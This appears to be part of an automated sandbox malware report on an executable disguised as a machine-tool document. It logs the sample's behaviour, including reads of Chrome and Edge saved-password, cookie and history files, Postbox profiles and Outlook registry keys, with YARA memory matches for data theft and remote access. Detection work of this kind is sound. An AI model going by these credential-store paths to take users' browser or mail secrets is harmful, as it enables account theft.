Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe VolumeInformation
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00405D1F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405D1F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR